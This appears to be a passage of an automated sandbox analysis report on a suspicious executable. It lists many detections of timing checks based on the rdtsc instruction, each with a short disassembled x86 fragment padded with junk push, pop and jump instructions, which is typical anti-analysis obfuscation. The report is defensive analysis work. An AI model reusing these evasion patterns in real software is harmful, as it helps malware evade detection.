              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA521 second address: ACA55B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F5444755FAEh 0x00000011 jmp 00007F5444755FABh 0x00000016 pop ebx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAA25 second address: ACAA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444E6F4FCh 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACABCD second address: ACABD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAD3F second address: ACAD5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444E6F505h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAD5A second address: ACAD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5444755FB6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F5444755FA6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB05E second address: ACB072 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F5444E6F4F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d ja 00007F5444E6F4F6h 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2277 second address: AD2289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FACh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2289 second address: AD229F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jg 00007F5444E6F4F6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6471D second address: A64740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5444755FA6h 0x0000000a jmp 00007F5444755FB4h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64740 second address: A64753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD80B9 second address: AD80BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6AAD second address: AD6AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6AB1 second address: AD6ABA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6C2F second address: AD6C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6C35 second address: AD6C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6C39 second address: AD6C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6F02 second address: AD6F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6F06 second address: AD6F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5444E6F4F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6F12 second address: AD6F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD74D8 second address: AD74DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD77EA second address: AD77FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD77FF second address: AD7809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5444E6F4F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7F5F second address: AD7F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE6EC second address: ADE6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDAD6 second address: ADDAFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F5444755FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F5444755FADh 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE30AA second address: AE30AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE30AE second address: AE30B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A558A3 second address: A558D1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5444E6F4F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F5444E6F504h 0x00000014 jmp 00007F5444E6F4FEh 0x00000019 jmp 00007F5444E6F4FCh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A558D1 second address: A558DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5444755FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A558DB second address: A558DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1F4E second address: AE1F76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5444755FA6h 0x00000009 jmp 00007F5444755FB9h 0x0000000e popad 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3DD3 second address: AA3DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4A7A second address: AA4A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4A7F second address: AA4A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2497h], ebx 0x00000012 push 0000001Eh 0x00000014 and ecx, 52836AA9h 0x0000001a push eax 0x0000001b push ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4F1C second address: AA4F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE221A second address: AE2249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F5444E6F4F6h 0x00000009 jmp 00007F5444E6F504h 0x0000000e jmp 00007F5444E6F4FDh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2249 second address: AE2262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F5444755FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F5444755FB6h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE29C9 second address: AE29D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5444E6F4F6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2C66 second address: AE2C75 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5444755FA6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2C75 second address: AE2C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5535 second address: AE553F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE508D second address: AE5093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5093 second address: AE509C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5200 second address: AE5204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5204 second address: AE520D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE520D second address: AE5214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5214 second address: AE5230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444755FB7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8778 second address: AE877C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7FCD second address: AE7FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8177 second address: AE817B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE817B second address: AE8185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5444755FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8185 second address: AE819D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F504h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8475 second address: AE8479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8479 second address: AE84AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F508h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5444E6F506h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE84AD second address: AE84B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD93 second address: AEDD9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD9B second address: AEDD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDF6B second address: AEDF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDF71 second address: AEDF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4939 second address: AA493F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA493F second address: AA4945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4945 second address: AA4949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4949 second address: AA498C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F5444755FB9h 0x0000000f jmp 00007F5444755FB3h 0x00000014 nop 0x00000015 jc 00007F5444755FAEh 0x0000001b push eax 0x0000001c or dword ptr [ebp+122D3795h], edx 0x00000022 pop ecx 0x00000023 push 00000004h 0x00000025 mov dword ptr [ebp+122D2C99h], edx 0x0000002b push eax 0x0000002c jg 00007F5444755FAEh 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE3B9 second address: AEE3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE3BE second address: AEE3C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE3C3 second address: AEE3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F5444E6F4F8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F5444E6F501h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE3E9 second address: AEE3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF31FE second address: AF3219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F506h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2484 second address: AF2490 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2490 second address: AF24CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F5444E6F504h 0x00000012 jmp 00007F5444E6F509h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2B87 second address: AF2B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2B8B second address: AF2BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F506h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jp 00007F5444E6F4F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2BAE second address: AF2BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6886 second address: AF688E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE5F6 second address: AFE600 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE600 second address: AFE623 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5444E6F4F6h 0x00000008 jmp 00007F5444E6F505h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE623 second address: AFE627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE627 second address: AFE631 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5444E6F4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC634 second address: AFC63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC63A second address: AFC675 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5444E6F502h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5444E6F4FAh 0x00000015 pushad 0x00000016 jmp 00007F5444E6F503h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC675 second address: AFC67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCC07 second address: AFCC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCC0B second address: AFCC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCF1C second address: AFCF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFD78A second address: AFD799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F5444755FA6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFD799 second address: AFD7C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jnl 00007F5444E6F516h 0x00000010 push edx 0x00000011 jbe 00007F5444E6F4F6h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F5444E6F4F6h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFD7C1 second address: AFD7C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFD7C5 second address: AFD7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDA84 second address: AFDA97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5444755FA6h 0x00000009 ja 00007F5444755FA6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDD8B second address: AFDD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDD91 second address: AFDD99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDD99 second address: AFDD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDD9D second address: AFDDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B033ED second address: B033F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0282E second address: B02832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02832 second address: B02836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B029F4 second address: B029FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B029FC second address: B02A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02B6F second address: B02B7F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5444755FA6h 0x00000008 jc 00007F5444755FA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02B7F second address: B02B90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F5444E6F4FAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02CCE second address: B02CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E31 second address: B02E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5444E6F4F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E3E second address: B02E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
